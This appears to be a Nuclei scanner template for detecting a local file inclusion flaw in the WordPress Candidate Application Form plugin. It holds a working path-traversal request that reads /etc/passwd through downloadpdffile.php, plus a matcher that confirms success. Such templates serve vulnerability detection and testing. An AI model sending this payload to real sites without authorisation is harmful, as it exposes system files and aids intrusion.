nuclei-templates/vulnerabilities/wordpress/candidate-application-lfi.yaml

32 lines
935 B
YAML

id: candidate-application-lfi
info:
name: WordPress Candidate Application Form <= 1.3 - Local File Inclusion
author: dhiyaneshDK
severity: high
description: WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks.
reference:
- https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-22
tags: wordpress,wp-plugin,lfi,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/04/21